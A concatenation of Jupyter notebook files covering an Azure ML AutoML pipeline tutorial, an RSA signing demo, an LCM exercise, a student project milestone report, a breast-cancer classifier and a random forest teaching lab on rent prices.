"## Introduction\nIn this example we showcase how you can use AzureML Dataset to load data for AutoML via AML Pipeline. \n\nIf you are using an Azure Machine Learning Notebook VM, you are all set. Otherwise, make sure you have executed the [configuration](https://aka.ms/pl-config) before running this notebook.\n\nIn this notebook you will learn how to:\n1. Create an `Experiment` in an existing `Workspace`.\n2. Create or Attach existing AmlCompute to a workspace.\n3. Define data loading in a `TabularDataset`.\n4. Configure AutoML using `AutoMLConfig`.\n5. Use AutoMLStep\n6. Train the model using AmlCompute\n7. Explore the results.\n8. Test the best fitted model.",
"_____no_output_____"
],
[
"## Azure Machine Learning and Pipeline SDK-specific imports",
"_____no_output_____"
]
],
[
[
"import logging\nimport os\nimport csv\n\nfrom matplotlib import pyplot as plt\nimport numpy as np\nimport pandas as pd\nfrom sklearn import datasets\nimport pkg_resources\n\nimport azureml.core\nfrom azureml.core.experiment import Experiment\nfrom azureml.core.workspace import Workspace\nfrom azureml.train.automl import AutoMLConfig\nfrom azureml.core.compute import AmlCompute\nfrom azureml.core.compute import ComputeTarget\nfrom azureml.core.dataset import Dataset\nfrom azureml.core.runconfig import RunConfiguration\nfrom azureml.core.conda_dependencies import CondaDependencies\n\nfrom azureml.train.automl.runtime import AutoMLStep\n\n# Check core SDK version number\nprint(\"SDK version:\", azureml.core.VERSION)",
"_____no_output_____"
]
],
[
[
"## Initialize Workspace\nInitialize a workspace object from persisted configuration. Make sure the config file is present at .\\config.json",
"_____no_output_____"
]
],
[
[
"ws = Workspace.from_config()\nprint(ws.name, ws.resource_group, ws.location, ws.subscription_id, sep = '\\n')",
"_____no_output_____"
]
],
[
[
"## Create an Azure ML experiment\nLet's create an experiment named \"automl-classification\" and a folder to hold the training scripts. The script runs will be recorded under the experiment in Azure.\n\nThe best practice is to use separate folders for scripts and its dependent files for each step and specify that folder as the `source_directory` for the step. This helps reduce the size of the snapshot created for the step (only the specific folder is snapshotted). Since changes in any files in the `source_directory` would trigger a re-upload of the snapshot, this helps keep the reuse of the step when there are no changes in the `source_directory` of the step.",
"_____no_output_____"
]
],
[
[
"# Choose a name for the run history container in the workspace.\nexperiment_name = 'automlstep-classification'\nproject_folder = './project'\n\nexperiment = Experiment(ws, experiment_name)\nexperiment",
"_____no_output_____"
]
],
[
[
"### Create or Attach an AmlCompute cluster\nYou will need to create a [compute target](https://docs.microsoft.com/azure/machine-learning/service/concept-azure-machine-learning-architecture#compute-target) for your AutoML run. In this tutorial, you get the default `AmlCompute` as your training compute resource.",
"_____no_output_____"
]
],
[
[
"# Choose a name for your cluster.\namlcompute_cluster_name = \"cpu-cluster\"\n\nfound = False\n# Check if this compute target already exists in the workspace.\ncts = ws.compute_targets\nif amlcompute_cluster_name in cts and cts[amlcompute_cluster_name].type == 'AmlCompute':\n found = True\n print('Found existing compute target.')\n compute_target = cts[amlcompute_cluster_name]\n \nif not found:\n print('Creating a new compute target...')\n provisioning_config = AmlCompute.provisioning_configuration(vm_size = \"STANDARD_D2_V2\", # for GPU, use \"STANDARD_NC6\"\n #vm_priority = 'lowpriority', # optional\n max_nodes = 4)\n\n # Create the cluster.\n compute_target = ComputeTarget.create(ws, amlcompute_cluster_name, provisioning_config)\n \n # Can poll for a minimum number of nodes and for a specific timeout.\n # If no min_node_count is provided, it will use the scale settings for the cluster.\n compute_target.wait_for_completion(show_output = True, min_node_count = 1, timeout_in_minutes = 10)\n \n # For a more detailed view of current AmlCompute status, use get_status().",
"_____no_output_____"
],
[
"# create a new RunConfig object\nconda_run_config = RunConfiguration(framework=\"python\")\n\nconda_run_config.environment.docker.enabled = True\nconda_run_config.environment.docker.base_image = azureml.core.runconfig.DEFAULT_CPU_IMAGE\n\ncd = CondaDependencies.create(pip_packages=['azureml-sdk[automl]'], \n conda_packages=['numpy', 'py-xgboost<=0.80'])\nconda_run_config.environment.python.conda_dependencies = cd\n\nprint('run config is ready')",
"_____no_output_____"
]
],
[
[
"## Data",
"_____no_output_____"
]
],
[
[
"# The data referenced here was a 1MB simple random sample of the Chicago Crime data into a local temporary directory.\nexample_data = 'https://dprepdata.blob.core.windows.net/demo/crime0-random.csv'\ndataset = Dataset.Tabular.from_delimited_files(example_data)\ndataset.to_pandas_dataframe().describe()",
"_____no_output_____"
],
[
"dataset.take(5).to_pandas_dataframe()",
"_____no_output_____"
]
],
[
[
"### Review the Dataset Result\n\nYou can peek the result of a TabularDataset at any range using `skip(i)` and `take(j).to_pandas_dataframe()`. Doing so evaluates only `j` records for all the steps in the TabularDataset, which makes it fast even against large datasets.\n\n`TabularDataset` objects are composed of a list of transformation steps (optional).",
"_____no_output_____"
]
],
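[
[
"As a minimal sketch (assuming the `dataset` variable defined above), `skip(i)` can be chained with `take(j)` to peek at a middle slice of the data without evaluating the rest; the values 5 and 5 below are just example numbers.",
"_____no_output_____"
]
],
[
[
"# Peek at rows 5-9 only; skip()/take() keep the evaluation lazy.\ndataset.skip(5).take(5).to_pandas_dataframe()",
"_____no_output_____"
]
],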
[
[
"X = dataset.drop_columns(columns=['Primary Type', 'FBI Code'])\ny = dataset.keep_columns(columns=['Primary Type'], validate=True)\nprint('X and y are ready!')",
"_____no_output_____"
]
],
[
[
"## Train\nThis creates a general AutoML settings object.",
"_____no_output_____"
]
],
[
[
"automl_settings = {\n \"iteration_timeout_minutes\" : 5,\n \"iterations\" : 2,\n \"primary_metric\" : 'AUC_weighted',\n \"preprocess\" : True,\n \"verbosity\" : logging.INFO\n}\nautoml_config = AutoMLConfig(task = 'classification',\n debug_log = 'automl_errors.log',\n path = project_folder,\n compute_target=compute_target,\n run_configuration=conda_run_config,\n X = X,\n y = y,\n **automl_settings\n )",
"_____no_output_____"
]
],
[
[
"You can define outputs for the AutoMLStep using TrainingOutput.",
"_____no_output_____"
]
],
[
[
"from azureml.pipeline.core import PipelineData, TrainingOutput\n\nds = ws.get_default_datastore()\nmetrics_output_name = 'metrics_output'\nbest_model_output_name = 'best_model_output'\n\nmetrics_data = PipelineData(name='metrics_data',\n datastore=ds,\n pipeline_output_name=metrics_output_name,\n training_output=TrainingOutput(type='Metrics'))\nmodel_data = PipelineData(name='model_data',\n datastore=ds,\n pipeline_output_name=best_model_output_name,\n training_output=TrainingOutput(type='Model'))",
"_____no_output_____"
]
],
[
[
"Create an AutoMLStep.",
"_____no_output_____"
]
],
[
[
"automl_step = AutoMLStep(\n name='automl_module',\n automl_config=automl_config,\n outputs=[metrics_data, model_data],\n allow_reuse=True)",
"_____no_output_____"
],
[
"from azureml.pipeline.core import Pipeline\npipeline = Pipeline(\n description=\"pipeline_with_automlstep\",\n workspace=ws, \n steps=[automl_step])",
"_____no_output_____"
],
[
"pipeline_run = experiment.submit(pipeline)",
"_____no_output_____"
],
[
"from azureml.widgets import RunDetails\nRunDetails(pipeline_run).show()",
"_____no_output_____"
],
[
"pipeline_run.wait_for_completion()",
"_____no_output_____"
]
],
[
[
"## Examine Results\n\n### Retrieve the metrics of all child runs\nOutputs of above run can be used as inputs of other steps in pipeline. In this tutorial, we will examine the outputs by retrieve output data and running some tests.",
"_____no_output_____"
]
],
[
[
"metrics_output = pipeline_run.get_pipeline_output(metrics_output_name)\nnum_file_downloaded = metrics_output.download('.', show_progress=True)",
"_____no_output_____"
],
[
"import json\nwith open(metrics_output._path_on_datastore) as f: \n metrics_output_result = f.read()\n \ndeserialized_metrics_output = json.loads(metrics_output_result)\ndf = pd.DataFrame(deserialized_metrics_output)\ndf",
"_____no_output_____"
]
],
[
[
"### Retrieve the Best Model",
"_____no_output_____"
]
],
[
[
"best_model_output = pipeline_run.get_pipeline_output(best_model_output_name)\nnum_file_downloaded = best_model_output.download('.', show_progress=True)",
"_____no_output_____"
],
[
"import pickle\n\nwith open(best_model_output._path_on_datastore, \"rb\" ) as f:\n best_model = pickle.load(f)\nbest_model",
"_____no_output_____"
]
],
[
[
"### Test the Model\n#### Load Test Data\nFor the test data, it should have the same preparation step as the train data. Otherwise it might get failed at the preprocessing step.",
"_____no_output_____"
]
],
[
[
"dataset = Dataset.Tabular.from_delimited_files(path='https://dprepdata.blob.core.windows.net/demo/crime0-test.csv')\ndf_test = dataset_test.to_pandas_dataframe()\ndf_test = df_test[pd.notnull(df['Primary Type'])]\n\ny_test = df_test[['Primary Type']]\nX_test = df_test.drop(['Primary Type', 'FBI Code'], axis=1)",
"_____no_output_____"
]
],
[
[
"#### Testing Our Best Fitted Model\n\nWe will use confusion matrix to see how our model works.",
"_____no_output_____"
]
],
[
[
"from pandas_ml import ConfusionMatrix\n\nypred = best_model.predict(X_test)\n\ncm = ConfusionMatrix(y_test['Primary Type'], ypred)\n\nprint(cm)\n\ncm.plot()",
"_____no_output_____"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown",
"markdown",
"markdown",
"markdown",
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
]
] |
cb04a2ec591ff3f384c68f7ca34d5c0aa95b04d5 | 3,346 | ipynb | Jupyter Notebook | .ipynb_checkpoints/signatures-checkpoint.ipynb | meowyen/BlockSkillz | 0ab5b270e1e85f86127fa2bdd90a3406e53eab7a | [
"MIT"
] | null | null | null | .ipynb_checkpoints/signatures-checkpoint.ipynb | meowyen/BlockSkillz | 0ab5b270e1e85f86127fa2bdd90a3406e53eab7a | [
"MIT"
] | 3 | 2021-05-02T21:05:01.000Z | 2021-05-07T01:53:21.000Z | signatures.ipynb | meowyen/BlockSkillz | 0ab5b270e1e85f86127fa2bdd90a3406e53eab7a | [
"MIT"
] | null | null | null | 25.738462 | 281 | 0.581291 | [
[
[
"from Crypto.PublicKey import RSA\nfrom Crypto.Signature.pkcs1_15 import PKCS115_SigScheme\nfrom Crypto.Hash import SHA256\nimport Crypto.Cipher\nfrom Crypto.Cipher import PKCS1_OAEP\nimport binascii\nimport base64\nimport ast\n# Generate 1024-bit RSA key pair (private + public key)\nkeyPair = RSA.generate(bits=1024)\npubKey = keyPair.publickey()\n\n# Encrypt keys\ntext= b'encrypting'\nencryptor = PKCS1_OAEP.new(pubKey)\nencrypted = encryptor.encrypt(text)\nprint(keyPair)",
"Private RSA key at 0x7FAC3531AEE0\n"
],
[
"decryptor = PKCS1_OAEP.new(keyPair)\ndecrypted = decryptor.decrypt(ast.literal_eval(str(encrypted)))\nprint(decrypted)",
"b'encrypting'\n"
],
[
"# Sign the message using the PKCS#1 v1.5 signature scheme (RSASP1)\nmsg = b'Message for RSA signing'\nhash = SHA256.new(msg)\nsigner = PKCS115_SigScheme(keyPair)\nsignature = signer.sign(hash)\nprint(\"Signature:\", binascii.hexlify(signature))\n\n# Verify valid PKCS#1 v1.5 signature (RSAVP1)\nmsg = b'Message for RSA signing'\nhash = SHA256.new(msg)\nverifier = PKCS115_SigScheme(pubKey)\ntry:\n verifier.verify(hash, signature)\n print(\"Signature is valid.\")\nexcept:\n print(\"Signature is invalid.\")\n\n# Verify invalid PKCS#1 v1.5 signature (RSAVP1)\nmsg = b'A tampered message'\nhash = SHA256.new(msg)\nverifier = PKCS115_SigScheme(pubKey)\ntry:\n verifier.verify(hash, signature)\n print(\"Signature is valid.\")\nexcept:\n print(\"Signature is invalid.\")\n ",
"Signature: b'318668084349c5a2fca31b0a3fac8b109928e74feb4ad402b44754a19bae2218b11c43f96d87d29ce428c3fc9d5f0ca5a31123d378c1465020a22c3cabcde5b6565c725cef00e7f40f30dd164f665611707e83b1ccae0dcc44b5751fa7347f32c06053ccb1c99fb8d35759d244662698d12b3a1e1364140d49b67339b3e6a6b1'\nSignature is valid.\nSignature is invalid.\n"
]
]
] | [
"code"
] | [
[
"code",
"code",
"code"
]
] |
cb04b5d03bde86a3a7857b81aa5c1433a691a5a7 | 3,599 | ipynb | Jupyter Notebook | number_theory/lcm.ipynb | EvgeniiaVak/brilliant-python-math | 2c61176b2fe43c8fa8ec6ff937113d1bacc04484 | [
"Unlicense"
] | null | null | null | number_theory/lcm.ipynb | EvgeniiaVak/brilliant-python-math | 2c61176b2fe43c8fa8ec6ff937113d1bacc04484 | [
"Unlicense"
] | null | null | null | number_theory/lcm.ipynb | EvgeniiaVak/brilliant-python-math | 2c61176b2fe43c8fa8ec6ff937113d1bacc04484 | [
"Unlicense"
] | null | null | null | 26.270073 | 412 | 0.560711 | [
[
[
"import number_theory_functions as f\nprint('Dependencies imported')",
"Dependencies imported\n"
]
],
[
[
"## The Least Common Multiple (LCM) of two integers can be found by figuring out their prime factors.",
"_____no_output_____"
]
],
[
[
"# For example let's take integers a and b\na=6\nb=10\nprint(\"factors of a:\",f.prime_factors_list(a))\nprint(\"factors of b:\",f.prime_factors_list(b))\n\n# Notice that if the two numbers have common factors these will be present in the lcm only once \nlcm=f.lcm(a,b)\nprint(\"lcm({},{})={}\".format(a, b, lcm))\nprint(\"and its prime factors are:\", f.prime_factors_list(lcm))",
"factors of a: [2, 3]\nfactors of b: [2, 5]\nlcm(6,10)=30\nand its prime factors are: [2, 3, 5]\n"
],
[
"# It is only logical when you think of numbers as of collections of their factors\nlist_of_factors=[7,3,2]\nprint(\"factors: \", list_of_factors)\n\nnumber=f.number_from(list_of_factors)\nprint(\"the number from the factors: \", number)",
"factors: [7, 3, 2]\nthe number from the factors: 42\n"
],
[
"# Such a number (or the super collection) will be the multiple of every sub-collection\n\ncol_a=list_of_factors[0:-1]\nna=f.number_from(col_a)\n\ncol_b=list_of_factors[1:]\nnb=f.number_from(col_b)\n\nprint(\"All factors, except the last: {} would form a number {}.\".format(col_a, na))\nprint(\"All factors, except the first: {} would form a number {}.\".format(col_b, nb))",
"All factors, except the last: [7, 3] would form a number 21.\nAll factors, except the first: [3, 2] would form a number 6.\n"
]
],
[
[
"For a number to be the LEAST common multiple of two numbers it's collection of factors should include only those, that are present in at least one of the two numbers and no more extra factors. By the fundamental theorem of arithmetic every number has a unique collection of prime factors, that's why we can use them for being the collections and don't be afraid of forgeting that for example 12 has 2 of 6.",
"_____no_output_____"
]
]
] | [
"code",
"markdown",
"code",
"markdown"
] | [
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code"
],
[
"markdown"
]
] |
cb04c72d73402ca956ad1998dce1c328489a7c0c | 2,772 | ipynb | Jupyter Notebook | Milestone3.ipynb | CSCI4850/S20-team1-project | 3d5a2de9f2d5e42c859a76f25c63d8292b5bc1e6 | [
"MIT"
] | 2 | 2020-03-31T20:42:00.000Z | 2020-05-31T19:50:03.000Z | .ipynb_checkpoints/Milestone3-checkpoint.ipynb | CSCI4850/S20-team1-project | 3d5a2de9f2d5e42c859a76f25c63d8292b5bc1e6 | [
"MIT"
] | null | null | null | .ipynb_checkpoints/Milestone3-checkpoint.ipynb | CSCI4850/S20-team1-project | 3d5a2de9f2d5e42c859a76f25c63d8292b5bc1e6 | [
"MIT"
] | 2 | 2020-04-01T00:11:10.000Z | 2020-10-01T23:29:18.000Z | 40.764706 | 298 | 0.616522 | [
[
[
"# Project Milestone -- 3\n\n## Group 1 -- SARSA\n\n\n| Deliverable | Percent Complete | Estimated Completion Date | Percent Complete by Next Milestone \n| --- | --- | --- | --- |\n| Code | 50% | Apr 23 | 100% |\n| Paper | 30% | Apr 23 | 100% |\n| Demo | 20% | May 01 | 80% |\n| Presentation | 20% | May 01 | 80% |\n\n\n1. What deliverable goals established in the last milestone report were accomplished to the anticipated percentage? \n \n Our goals for the paper, demo and the presentation were achieved as predicted. We have started on all three of those and added a bit.\n \n\n2. What deliverable goals established in the last milestone report were not accomplished to the anticipated percentage? \n \n The goal of our code was not fully accomplished. We have a working demo available, but we are still undecided on whether that portion of the code is what will be the final code. We are looking to research a little more on different possible networks that will work better in our case. \n\n\n3. What are the main deliverable goals to meet before the next milestone report, and who is working on them?\n\n Girgis Shihataa -- Finish up research on the YoloV3 network. Finish up the paper portion of the project.\n\n William Smith -- Working on the paper with Girgis.\n\n Justin Hill -- Continue working on YoloV3 and presentation.\n \n Michael Ketzner -- I'll continue looking into working on a YOLO network and maybe work on an interface to monitor a parking lot with the current CNN that we have.\n\n Carolous Ghobrial -- Continue working on the Yolo V3 network, and assist with the paper and presentation.\n\n Mubarek Mohammed -- I am working the YOLOv3 architecture. I recently used a pre-trained model to classify cars and motorcycles. The next step I was planning was making the model architecture. I can also continue working on the CNN to diversify compared to everyone else work on YOLOv3.",
"_____no_output_____"
]
]
] | [
"markdown"
] | [
[
"markdown"
]
] |
cb04c864af4ceac9eb5b4d8e51e021577d082ed0 | 107,953 | ipynb | Jupyter Notebook | version2/breast-cancer classification.ipynb | zahrael97/BreastCancer_Classsification | 816179d58c7ef795657ba1c4636af1037acc19b9 | [
"MIT"
] | 1 | 2020-01-05T10:37:49.000Z | 2020-01-05T10:37:49.000Z | version2/breast-cancer classification.ipynb | zahrael97/BreastCancer_Classsification | 816179d58c7ef795657ba1c4636af1037acc19b9 | [
"MIT"
] | null | null | null | version2/breast-cancer classification.ipynb | zahrael97/BreastCancer_Classsification | 816179d58c7ef795657ba1c4636af1037acc19b9 | [
"MIT"
] | 1 | 2020-01-10T16:06:17.000Z | 2020-01-10T16:06:17.000Z | 107.737525 | 74,812 | 0.793382 | [
[
[
"# Breast-Cancer Classification",
"_____no_output_____"
]
],
[
[
"#WOHOO already Version 2 I learned How to explore Data",
"_____no_output_____"
]
],
[
[
"# Library",
"_____no_output_____"
]
],
[
[
"# Import Dependencies\n%matplotlib inline\n\n# Start Python Imports\nimport math, time, random, datetime\n\n# Data Manipulation\nimport numpy as np\nimport pandas as pd\n\n# Visualization \nimport matplotlib.pyplot as plt\nimport missingno\nimport seaborn as sns\nplt.style.use('seaborn-whitegrid')\n\n# Preprocessing\nfrom sklearn.preprocessing import OneHotEncoder, LabelEncoder, label_binarize\n\n# Machine learning\nimport catboost\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import model_selection, tree, preprocessing, metrics, linear_model\nfrom sklearn.svm import LinearSVC\nfrom sklearn.ensemble import GradientBoostingClassifier\nfrom sklearn.neighbors import KNeighborsClassifier\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn.linear_model import LinearRegression, LogisticRegression, SGDClassifier\nfrom sklearn.tree import DecisionTreeClassifier\nfrom catboost import CatBoostClassifier, Pool, cv\n\n# Let's be rebels and ignore warnings for now\nimport warnings\nwarnings.filterwarnings('ignore')",
"_____no_output_____"
]
],
[
[
"# Exploring the dataset",
"_____no_output_____"
]
],
[
[
"dataset = pd.read_csv('data.csv')\ndataset.drop('Unnamed: 32', inplace=True, axis=1)",
"_____no_output_____"
],
[
"dataset.head()",
"_____no_output_____"
],
[
"# Plot graphic of missing values\nmissingno.matrix(dataset, figsize = (30,10))\n",
"_____no_output_____"
],
[
"dataset.columns",
"_____no_output_____"
],
[
"print(dataset.shape)\ndataset.describe()",
"(569, 32)\n"
],
[
"dataset.isnull().sum()",
"_____no_output_____"
],
[
"X = dataset.iloc[:, 2:].values\ny = dataset.iloc[:, 1:2].values ",
"_____no_output_____"
]
],
[
[
"# spliting the dataset",
"_____no_output_____"
]
],
[
[
"from sklearn.model_selection import train_test_split\nX_train, X_test, y_train, y_test = train_test_split(X, y, test_size= 0.2)",
"_____no_output_____"
],
[
"#categorical values\nfrom sklearn.preprocessing import LabelEncoder\nlabel_y = LabelEncoder()\ny_train = label_y.fit_transform(y_train)\ny_test = label_y.transform(y_test)",
"_____no_output_____"
]
],
[
[
"# Method 1",
"_____no_output_____"
],
[
"## Fitting the model and analysing",
"_____no_output_____"
]
],
[
[
"#fitting\nfrom sklearn.linear_model import LogisticRegression\nclassifier = LogisticRegression(n_jobs= -1)\nclassifier.fit(X_train, y_train)",
"_____no_output_____"
],
[
"#predicting\ny_pred = classifier.predict(X_test)",
"_____no_output_____"
],
[
"#confusion matrix\nfrom sklearn.metrics import confusion_matrix\nconfusion_matrix(y_test, y_pred)",
"_____no_output_____"
],
[
"# classification analysis\nfrom sklearn.metrics import classification_report\nprint(classification_report(y_test, y_pred))",
" precision recall f1-score support\n\n 0 0.97 0.96 0.97 77\n 1 0.92 0.95 0.93 37\n\n micro avg 0.96 0.96 0.96 114\n macro avg 0.95 0.95 0.95 114\nweighted avg 0.96 0.96 0.96 114\n\n"
],
[
"# k-fold cross vallidation\nfrom sklearn.model_selection import cross_val_score\naccuracies = cross_val_score(estimator=classifier, X=X_train, y=y_train,cv= 10, n_jobs=-1)\nprint(accuracies.mean(), accuracies.std())",
"0.9495652173913044 0.029335408199644544\n"
]
],
[
[
"# Method 2 ",
"_____no_output_____"
],
[
"# Function that runs the requested algorithm and returns the accuracy metrics",
"_____no_output_____"
]
],
[
[
"def fit_ml_algo(algo, X_train, y_train, cv):\n \n # One Pass\n model = algo.fit(X_train, y_train)\n acc = round(model.score(X_train, y_train) * 100, 2)\n \n # Cross Validation \n train_pred = model_selection.cross_val_predict(algo, \n X_train, \n y_train, \n cv=cv, \n n_jobs = -1)\n # Cross-validation accuracy metric\n acc_cv = round(metrics.accuracy_score(y_train, train_pred) * 100, 2)\n \n return train_pred, acc, acc_cv",
"_____no_output_____"
],
[
"start_time = time.time()\ntrain_pred_log, acc_log, acc_cv_log = fit_ml_algo(LogisticRegression(), \n X_train, \n y_train, \n 10)\nlog_time = (time.time() - start_time)\nprint(\"Accuracy: %s\" % acc_log)\nprint(\"Accuracy CV 10-Fold: %s\" % acc_cv_log)\nprint(\"Running Time: %s\" % datetime.timedelta(seconds=log_time))",
"Accuracy: 95.38\nAccuracy CV 10-Fold: 94.95\nRunning Time: 0:00:00.078176\n"
]
]
] | [
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code",
"markdown",
"code"
] | [
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code"
],
[
"markdown"
],
[
"code",
"code",
"code",
"code",
"code",
"code",
"code"
],
[
"markdown"
],
[
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code",
"code",
"code",
"code"
],
[
"markdown",
"markdown"
],
[
"code",
"code"
]
] |
cb04c8afa9027491bde6ce83b3d08a7957cc6c66 | 33,520 | ipynb | Jupyter Notebook | labs/trees/random-forests.ipynb | Ming2010/msds621 | 4976b4c1547890b590383685ca7a7d665cc81ba5 | [
"MIT"
] | 300 | 2019-07-23T17:30:45.000Z | 2022-03-28T18:45:16.000Z | labs/trees/random-forests.ipynb | Ming2010/msds621 | 4976b4c1547890b590383685ca7a7d665cc81ba5 | [
"MIT"
] | 1 | 2019-11-19T05:42:19.000Z | 2019-12-04T20:16:26.000Z | labs/trees/random-forests.ipynb | Ming2010/msds621 | 4976b4c1547890b590383685ca7a7d665cc81ba5 | [
"MIT"
] | 128 | 2019-08-02T20:11:35.000Z | 2022-03-27T19:12:24.000Z | 26.393701 | 430 | 0.547584 | [
[
[
"# Exploring Random Forests",
"_____no_output_____"
]
],
[
[
"import numpy as np\nimport pandas as pd\n\nfrom sklearn.ensemble import RandomForestClassifier, RandomForestRegressor\nfrom sklearn.datasets import load_boston, load_iris, load_wine, load_digits, \\\n load_breast_cancer, load_diabetes\n\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import confusion_matrix, precision_score, recall_score\n\nfrom sklearn.tree import DecisionTreeClassifier, DecisionTreeRegressor\nfrom sklearn.metrics import mean_absolute_error\n\nimport matplotlib.pyplot as plt\n%config InlineBackend.figure_format = 'retina'\n\nfrom rfpimp import *\n\nfrom distutils.version import LooseVersion\nif LooseVersion(sklearn.__version__) >= LooseVersion(\"0.24\"):\n # In sklearn version 0.24, forest module changed to be private.\n from sklearn.ensemble._forest import _generate_unsampled_indices\n from sklearn.ensemble import _forest as forest\nelse:\n # Before sklearn version 0.24, forest was public, supporting this.\n from sklearn.ensemble.forest import _generate_unsampled_indices\n from sklearn.ensemble import forest\n\nfrom sklearn import tree\nfrom dtreeviz.trees import *",
"_____no_output_____"
],
[
"def rent(n=None, bootstrap=False):\n df_rent = pd.read_csv(\"data/rent-ideal.csv\")\n if n is None:\n n = len(df_rent)\n df_rent = df_rent.sample(n, replace=bootstrap)\n X = df_rent[['bedrooms','bathrooms','latitude','longitude']]\n y = df_rent['price']\n return X, y\n\ndef boston():\n boston = load_boston()\n X = boston.data\n y = boston.target\n features = boston.feature_names\n df = pd.DataFrame(data=X,columns=features)\n df['y'] = y\n return df",
"_____no_output_____"
]
],
[
[
"## Set up\n\nGet the `rent-ideal.csv` data file from canvas \"files area\" and store in the data directory underneath your notebook directory.",
"_____no_output_____"
]
],
[
[
"X, y = rent()\nX.head(3)",
"_____no_output_____"
],
[
"X.shape",
"_____no_output_____"
]
],
[
[
"## Train random forests of different sizes\n\nAs we increase the number of trees in the forest, we initially see model bias going down. It will asymptotically approach some minimum error on the testing set.",
"_____no_output_____"
]
],
[
[
"X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.20)",
"_____no_output_____"
]
],
[
[
"Here's how to train a random forest that has a single tree:",
"_____no_output_____"
]
],
[
[
"rf = RandomForestRegressor(n_estimators=1)\nrf.fit(X_train, y_train)",
"_____no_output_____"
]
],
[
[
"**Task**: Compute the MAE for the training and the testing set, printing them out.",
"_____no_output_____"
]
],
[
[
"mae_train = mean_absolute_error(...)\nmae = mean_absolute_error(...)\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Task**: Run the training and testing cycle several times to see the variance: the test scores bounce around a lot.",
"_____no_output_____"
],
[
"**Task**: Increase the number of trees (`n_estimators`) to 2, retrain, and print out the results.",
"_____no_output_____"
]
],
[
[
"rf = ...\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nrf = RandomForestRegressor(n_estimators=2)\nrf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"You should notice the both test MAE scores going down and bouncing around less from run to run.",
"_____no_output_____"
],
[
"**Q.** Why does the MAE score go down?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\n With 2 trees, the chances are that the random forest will have seen (trained on) more of the original training set, despite bootstrapping.\n</details>",
"_____no_output_____"
],
[
"**Task**: Increase the number of trees (`n_estimators`) to 10, retrain, and print out the results.",
"_____no_output_____"
]
],
[
[
"rf = ...\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nrf = RandomForestRegressor(n_estimators=10)\nrf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Q.** What you notice about the MAE scores?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nThey are getting smaller.\n</details>",
"_____no_output_____"
],
[
"**Q.** After running several times, what else do you notice?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\n With 10 trees, the prediction from run to run varies a lot less. We have reduced variance, improving generality.\n</details>",
"_____no_output_____"
],
[
"**Task**: Increase the number of trees (`n_estimators`) to 200, retrain, and print out the results.",
"_____no_output_____"
]
],
[
[
"rf = ...\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nrf = RandomForestRegressor(n_estimators=200)\n%time rf.fit(X_train, y_train) # how long does this take?\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Q.** What you notice about the MAE scores from a single run?",
"_____no_output_____"
],
[
"<details>\n<summary>Solution</summary>\nThey are a bit smaller, but not by much.\n</details>",
"_____no_output_____"
],
[
"**Task**: Notice that it took a long time to train, about 10 seconds. Do the exact same thing again but this time use `n_jobs=-1` as an argument to the `RandomForestRegressor` constructor.\n\nThis tells the library to use all processing cores available on the computer processor. As long as the data is not too huge (because it must pass it around), it often goes much faster using this argument. It should take less than two seconds.",
"_____no_output_____"
]
],
[
[
"rf = ...\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")",
"_____no_output_____"
]
],
[
[
"<details>\n<summary>Solution</summary>\n<pre>\nrf = RandomForestRegressor(n_estimators=200, n_jobs=-1)\n%time rf.fit(X_train, y_train)\nmae_train = mean_absolute_error(y_train, rf.predict(X_train))\nmae = mean_absolute_error(y_test, rf.predict(X_test))\nprint(f\"MAE train {mae_train:.1f}$, test {mae:.1f}$\")\n</pre>\n</details>",
"_____no_output_____"
],
[
"**Q.** What you notice about the MAE scores from SEVERAL runs?",
